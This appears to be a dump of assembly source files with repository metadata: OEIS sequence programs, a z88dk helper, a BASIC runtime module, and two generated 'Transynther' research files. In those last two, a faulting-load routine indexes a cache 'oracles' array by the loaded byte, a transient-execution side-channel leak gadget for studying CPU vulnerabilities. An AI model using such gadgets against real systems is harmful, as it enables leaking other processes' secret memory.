00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
*/
| 42.669355 | 2,999 | 0.657721 |
060ffc62baf0cd1dcd6554c08f206be7e5558f23 | 536 | asm | Assembly | oeis/276/A276261.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/276/A276261.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/276/A276261.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A276261: Centered 21-gonal primes.
; Submitted by Simon Strandgaard
; 127,211,757,2521,2857,6301,8527,16381,19867,23689,24697,27847,32341,37171,38431,42337,66361,68041,82237,89839,97777,103951,114661,140071,152461,162751,170689,192781,204331,216217,231547,240997,284131,308827,353557,357421,385057,389089
mov $2,332202
lpb $2
mov $3,$5
seq $3,10051 ; Characteristic function of primes: 1 if n is prime, else 0.
sub $0,$3
add $1,21
mov $4,$0
max $4,0
cmp $4,$0
mul $2,$4
sub $2,18
add $5,$1
lpe
mov $0,$5
add $0,1
| 26.8 | 236 | 0.710821 |
81a9e983c3cef48cbe06fdb6689c3681bae6710c | 682 | asm | Assembly | oeis/180/A180674.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/180/A180674.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/180/A180674.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A180674: a(n) = Fibonacci(n+9) - Fibonacci(9).
; Submitted by Jon Maiga
; 0,21,55,110,199,343,576,953,1563,2550,4147,6731,10912,17677,28623,46334,74991,121359,196384,317777,514195,832006,1346235,2178275,3524544,5702853,9227431,14930318,24157783,39088135,63245952,102334121,165580107,267914262,433494403,701408699,1134903136,1836311869,2971215039,4807526942,7778742015,12586268991,20365011040,32951280065,53316291139,86267571238,139583862411,225851433683,365435296128,591286729845,956722026007,1548008755886,2504730781927,4052739537847,6557470319808,10610209857689
add $0,4
mov $1,2
mov $3,3
lpb $0
sub $0,1
mov $2,$3
add $3,$1
mov $1,$2
lpe
add $3,$1
mov $0,$3
sub $0,34
| 40.117647 | 491 | 0.793255 |
770a45bc59c9278898b5f105d660a3d44825e78c | 292 | asm | Assembly | libsrc/_DEVELOPMENT/l/sdcc/____sdcc_4_xor_src_debc_mhl_dst_debc.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 640 | 2017-01-14T23:33:45.000Z | 2022-03-30T11:28:42.000Z | libsrc/_DEVELOPMENT/l/sdcc/____sdcc_4_xor_src_debc_mhl_dst_debc.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 1,600 | 2017-01-15T16:12:02.000Z | 2022-03-31T12:11:12.000Z | libsrc/_DEVELOPMENT/l/sdcc/____sdcc_4_xor_src_debc_mhl_dst_debc.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 215 | 2017-01-17T10:43:03.000Z | 2022-03-23T17:25:02.000Z | SECTION code_clib
SECTION code_l_sdcc
PUBLIC ____sdcc_4_xor_src_debc_mhl_dst_debc
____sdcc_4_xor_src_debc_mhl_dst_debc:
ld a,(hl)
xor c
ld c,a
inc hl
ld a,(hl)
xor b
ld b,a
inc hl
ld a,(hl)
xor e
ld e,a
inc hl
ld a,(hl)
xor d
ld d,a
ret
| 11.68 | 43 | 0.623288 |
409f7b082b2f7f4c8b0cfc48fccd2e5e8700fb54 | 1,346 | asm | Assembly | 45/runtime/rt/stringfp.asm | minblock/msdos | 479ffd237d9bb7cc83cb06361db2c4ef42dfbac0 | [
"Apache-2.0"
] | null | null | null | 45/runtime/rt/stringfp.asm | minblock/msdos | 479ffd237d9bb7cc83cb06361db2c4ef42dfbac0 | [
"Apache-2.0"
] | null | null | null | 45/runtime/rt/stringfp.asm | minblock/msdos | 479ffd237d9bb7cc83cb06361db2c4ef42dfbac0 | [
"Apache-2.0"
] | null | null | null | TITLE STRINGFP - Floating Point String Functions
PAGE 56,132
;***
; STRINGFP - Floating Point ST$ functions
;
; Copyright <C> 1986, Microsoft Corporation
;
;Purpose:
;
; BASIC Syntax mapping to included runtime entry points:
;
;
; - STR$ Function -
;
; v$ = STR$(x)
;
; Examples:
;
; v$ = STR$(b@) v$ = STR$(a!) v$ = STR$(x#)
; | | |
; B$STCY B$STR4 B$STR8
;
;
;****
INCLUDE switch.inc
INCLUDE rmacros.inc
useSeg _DATA
USESEG _BSS
useSeg ST_TEXT
INCLUDE seg.inc
INCLUDE rtps.inc
INCLUDE baslibma.inc
sBegin ST_TEXT
ASSUMES CS,ST_TEXT
externNP B$FloatCONASC ;Pull in floating point conversion routines
externNP B$STR_COMMON ;Common support for STR$
SUBTTL STR$ - Create String from number
PAGE
;***
;B$STR4, B$STR8, B$STCY - STR$ function support
;
;Purpose:
; Runtime Entry Points
; Create a string representing the number in ASCII
;
;Entry:
; parameter value is on the stack (R4, R8 or CY)
;
;Exit:
; AX = Address of string descriptor
;
;Uses:
; Per Convention
;
;Exceptions:
; Out of memory
;****
cProc B$STR4,<PUBLIC,FAR>
parmD arg4
cBegin
MOV AL,VT_R4
LEA BX,arg4
cCall B$STR_COMMON
cEnd
cProc B$STR8,<PUBLIC,FAR>
ParmQ R8Arg
cBegin
MOV AL,VT_R8 ;AL = data type
LEA BX,R8Arg ;BX = ptr to data
cCall B$STR_COMMON ;call common routine to convert
cEnd
sEND ST_TEXT
END
| 15.471264 | 67 | 0.676077 |
1287788e34bfb98593ec4e52ba3a298bcdf66a9e | 4,137 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca_notsx.log_21829_1544.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca_notsx.log_21829_1544.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca_notsx.log_21829_1544.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r8
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_D_ht+0x1b0b3, %rsi
lea addresses_WT_ht+0x5e03, %rdi
nop
nop
nop
nop
cmp $35734, %r8
mov $34, %rcx
rep movsb
nop
nop
sub %rbx, %rbx
pop %rsi
pop %rdi
pop %rcx
pop %rbx
pop %r8
ret
.global s_faulty_load
s_faulty_load:
push %r12
push %r14
push %r15
push %rax
push %rbp
push %rcx
// Faulty Load
lea addresses_RW+0x198c3, %rcx
nop
nop
xor %r12, %r12
vmovups (%rcx), %ymm4
vextracti128 $0, %ymm4, %xmm4
vpextrq $1, %xmm4, %rbp
lea oracles, %r14
and $0xff, %rbp
shlq $12, %rbp
mov (%r14,%rbp,1), %rbp
pop %rcx
pop %rbp
pop %rax
pop %r15
pop %r14
pop %r12
ret
/*
<gen_faulty_load>
[REF]
{'src': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 0, 'same': True, 'type': 'addresses_RW'}, 'OP': 'LOAD'}
[Faulty Load]
{'src': {'NT': False, 'AVXalign': False, 'size': 32, 'congruent': 0, 'same': True, 'type': 'addresses_RW'}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'congruent': 4, 'same': False, 'type': 'addresses_D_ht'}, 'dst': {'congruent': 6, 'same': True, 'type': 'addresses_WT_ht'}, 'OP': 'REPM'}
{'32': 21829}
32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32
*/
| 61.746269 | 2,999 | 0.664249 |
13d86a95c9776158e0748049668a03cfe32f95e1 | 2,111 | asm | Assembly | programs/oeis/237/A237617.asm | jmorken/loda | 99c09d2641e858b074f6344a352d13bc55601571 | [
"Apache-2.0"
] | 1 | 2021-03-15T11:38:20.000Z | 2021-03-15T11:38:20.000Z | programs/oeis/237/A237617.asm | jmorken/loda | 99c09d2641e858b074f6344a352d13bc55601571 | [
"Apache-2.0"
] | null | null | null | programs/oeis/237/A237617.asm | jmorken/loda | 99c09d2641e858b074f6344a352d13bc55601571 | [
"Apache-2.0"
] | null | null | null | ; A237617: a(n) = n*(n + 1)*(17*n - 14)/6.
; 0,1,20,74,180,355,616,980,1464,2085,2860,3806,4940,6279,7840,9640,11696,14025,16644,19570,22820,26411,30360,34684,39400,44525,50076,56070,62524,69455,76880,84816,93280,102289,111860,122010,132756,144115,156104,168740,182040,196021,210700,226094,242220,259095,276736,295160,314384,334425,355300,377026,399620,423099,447480,472780,499016,526205,554364,583510,613660,644831,677040,710304,744640,780065,816596,854250,893044,932995,974120,1016436,1059960,1104709,1150700,1197950,1246476,1296295,1347424,1399880,1453680,1508841,1565380,1623314,1682660,1743435,1805656,1869340,1934504,2001165,2069340,2139046,2210300,2283119,2357520,2433520,2511136,2590385,2671284,2753850,2838100,2924051,3011720,3101124,3192280,3285205,3379916,3476430,3574764,3674935,3776960,3880856,3986640,4094329,4203940,4315490,4428996,4544475,4661944,4781420,4902920,5026461,5152060,5279734,5409500,5541375,5675376,5811520,5949824,6090305,6232980,6377866,6524980,6674339,6825960,6979860,7136056,7294565,7455404,7618590,7784140,7952071,8122400,8295144,8470320,8647945,8828036,9010610,9195684,9383275,9573400,9766076,9961320,10159149,10359580,10562630,10768316,10976655,11187664,11401360,11617760,11836881,12058740,12283354,12510740,12740915,12973896,13209700,13448344,13689845,13934220,14181486,14431660,14684759,14940800,15199800,15461776,15726745,15994724,16265730,16539780,16816891,17097080,17380364,17666760,17956285,18248956,18544790,18843804,19146015,19451440,19760096,20072000,20387169,20705620,21027370,21352436,21680835,22012584,22347700,22686200,23028101,23373420,23722174,24074380,24430055,24789216,25151880,25518064,25887785,26261060,26637906,27018340,27402379,27790040,28181340,28576296,28974925,29377244,29783270,30193020,30606511,31023760,31444784,31869600,32298225,32730676,33166970,33607124,34051155,34499080,34950916,35406680,35866389,36330060,36797710,37269356,37745015,38224704,38708440,39196240,39688121,40184100,40684194,41188420,41696795,42209336,42726060,43246984,43772125
mov $3,$0
lpb $0
sub $0,1
add $4,$3
sub $4,1
add $4,$3
add $2,$4
add $1,$2
mov $3,6
lpe
| 150.785714 | 1,964 | 0.842255 |
6622d0494be5ea34d545736a075066a1befeec34 | 462 | asm | Assembly | programs/oeis/257/A257993.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/257/A257993.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/257/A257993.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A257993: Least gap in the partition having Heinz number n; index of the least prime not dividing n.
; 1,2,1,2,1,3,1,2,1,2,1,3,1,2,1,2,1,3,1,2,1,2,1,3,1,2,1,2,1,4,1,2,1,2,1,3,1,2,1,2,1,3,1,2,1,2,1,3,1,2,1,2,1,3,1,2,1,2,1,4,1,2,1,2,1,3,1,2,1,2,1,3,1,2,1,2,1,3,1,2,1,2,1,3,1,2,1,2,1,4,1,2,1,2,1,3,1,2,1,2
add $0,1
pow $0,3
sub $0,1
seq $0,55874 ; a(n) = largest m such that 1, 2, ..., m divide n.
seq $0,230980 ; Number of primes <= n, starting at n=0.
add $0,1
| 46.2 | 201 | 0.590909 |
2ab611f1f46d07306b9cf6dd7d859103004a3c23 | 8,121 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0.log_21829_898.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0.log_21829_898.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0.log_21829_898.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r9
push %rax
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_WC_ht+0x106da, %rsi
lea addresses_A_ht+0x1e42a, %rdi
nop
add %rbp, %rbp
mov $25, %rcx
rep movsw
nop
nop
nop
cmp $1989, %r9
lea addresses_normal_ht+0x156da, %r11
nop
nop
sub $48894, %rdx
movw $0x6162, (%r11)
nop
nop
nop
and $25843, %r9
lea addresses_D_ht+0x1ebc8, %rcx
clflush (%rcx)
nop
nop
nop
nop
mfence
movups (%rcx), %xmm0
vpextrq $0, %xmm0, %rdi
nop
nop
nop
nop
sub $41725, %rcx
lea addresses_normal_ht+0x19fda, %rdx
nop
nop
nop
nop
nop
add $58407, %r9
mov (%rdx), %rbp
nop
nop
nop
nop
nop
and $42726, %r11
lea addresses_WC_ht+0x13eda, %rdi
add %r9, %r9
vmovups (%rdi), %ymm4
vextracti128 $1, %ymm4, %xmm4
vpextrq $0, %xmm4, %rsi
nop
and %rdx, %rdx
lea addresses_A_ht+0xa4da, %rsi
lea addresses_WC_ht+0x486a, %rdi
nop
nop
nop
nop
nop
dec %r11
mov $9, %rcx
rep movsl
nop
nop
nop
nop
inc %r9
lea addresses_WC_ht+0x3eda, %rsi
lea addresses_A_ht+0x10ada, %rdi
nop
nop
nop
nop
nop
sub $6604, %rax
mov $1, %rcx
rep movsl
nop
nop
nop
cmp %rcx, %rcx
lea addresses_UC_ht+0x4da, %rcx
nop
add $42220, %rdi
mov $0x6162636465666768, %rdx
movq %rdx, %xmm6
movups %xmm6, (%rcx)
nop
nop
and %r9, %r9
lea addresses_A_ht+0x23da, %rax
nop
nop
nop
nop
add %rdx, %rdx
mov $0x6162636465666768, %rdi
movq %rdi, %xmm6
vmovups %ymm6, (%rax)
nop
nop
nop
nop
nop
cmp $39838, %rsi
lea addresses_WC_ht+0x14eda, %rax
clflush (%rax)
and $38662, %rsi
mov $0x6162636465666768, %rcx
movq %rcx, (%rax)
nop
add $2545, %r9
lea addresses_WT_ht+0xaeda, %rcx
nop
nop
dec %rdx
mov (%rcx), %r11
nop
nop
nop
nop
nop
cmp %rbp, %rbp
lea addresses_UC_ht+0x17cc2, %rsi
clflush (%rsi)
nop
sub $41239, %rdx
mov (%rsi), %r11
nop
nop
nop
xor %r11, %r11
lea addresses_normal_ht+0x160da, %rdi
nop
nop
cmp $669, %r9
mov $0x6162636465666768, %r11
movq %r11, %xmm5
movups %xmm5, (%rdi)
nop
dec %r9
lea addresses_UC_ht+0x10612, %rbp
sub %r11, %r11
movw $0x6162, (%rbp)
nop
and $45660, %rbp
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rbp
pop %rax
pop %r9
pop %r11
ret
.global s_faulty_load
s_faulty_load:
push %r10
push %r13
push %r14
push %rbx
push %rcx
push %rdx
push %rsi
// Store
lea addresses_PSE+0x118da, %rbx
nop
cmp $6419, %r10
mov $0x5152535455565758, %r14
movq %r14, (%rbx)
nop
nop
nop
and %r10, %r10
// Store
mov $0x3da, %r14
clflush (%r14)
nop
nop
nop
sub %rsi, %rsi
movb $0x51, (%r14)
nop
nop
nop
nop
nop
sub %r10, %r10
// Faulty Load
lea addresses_D+0x76da, %r13
nop
nop
nop
nop
nop
and %r14, %r14
vmovups (%r13), %ymm6
vextracti128 $0, %ymm6, %xmm6
vpextrq $1, %xmm6, %rbx
lea oracles, %rcx
and $0xff, %rbx
shlq $12, %rbx
mov (%rcx,%rbx,1), %rbx
pop %rsi
pop %rdx
pop %rcx
pop %rbx
pop %r14
pop %r13
pop %r10
ret
/*
<gen_faulty_load>
[REF]
{'src': {'NT': False, 'same': False, 'congruent': 0, 'type': 'addresses_D', 'AVXalign': False, 'size': 1}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 9, 'type': 'addresses_PSE', 'AVXalign': False, 'size': 8}}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 6, 'type': 'addresses_P', 'AVXalign': False, 'size': 1}}
[Faulty Load]
{'src': {'NT': False, 'same': True, 'congruent': 0, 'type': 'addresses_D', 'AVXalign': False, 'size': 32}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'same': False, 'congruent': 11, 'type': 'addresses_WC_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 3, 'type': 'addresses_A_ht'}}
{'OP': 'STOR', 'dst': {'NT': True, 'same': False, 'congruent': 11, 'type': 'addresses_normal_ht', 'AVXalign': False, 'size': 2}}
{'src': {'NT': False, 'same': False, 'congruent': 1, 'type': 'addresses_D_ht', 'AVXalign': False, 'size': 16}, 'OP': 'LOAD'}
{'src': {'NT': False, 'same': False, 'congruent': 4, 'type': 'addresses_normal_ht', 'AVXalign': False, 'size': 8}, 'OP': 'LOAD'}
{'src': {'NT': False, 'same': False, 'congruent': 10, 'type': 'addresses_WC_ht', 'AVXalign': False, 'size': 32}, 'OP': 'LOAD'}
{'src': {'same': False, 'congruent': 3, 'type': 'addresses_A_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 4, 'type': 'addresses_WC_ht'}}
{'src': {'same': False, 'congruent': 8, 'type': 'addresses_WC_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 9, 'type': 'addresses_A_ht'}}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 7, 'type': 'addresses_UC_ht', 'AVXalign': False, 'size': 16}}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 6, 'type': 'addresses_A_ht', 'AVXalign': False, 'size': 32}}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 11, 'type': 'addresses_WC_ht', 'AVXalign': True, 'size': 8}}
{'src': {'NT': False, 'same': False, 'congruent': 11, 'type': 'addresses_WT_ht', 'AVXalign': True, 'size': 8}, 'OP': 'LOAD'}
{'src': {'NT': False, 'same': False, 'congruent': 3, 'type': 'addresses_UC_ht', 'AVXalign': False, 'size': 8}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 8, 'type': 'addresses_normal_ht', 'AVXalign': False, 'size': 16}}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 3, 'type': 'addresses_UC_ht', 'AVXalign': False, 'size': 2}}
{'36': 21829}
36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 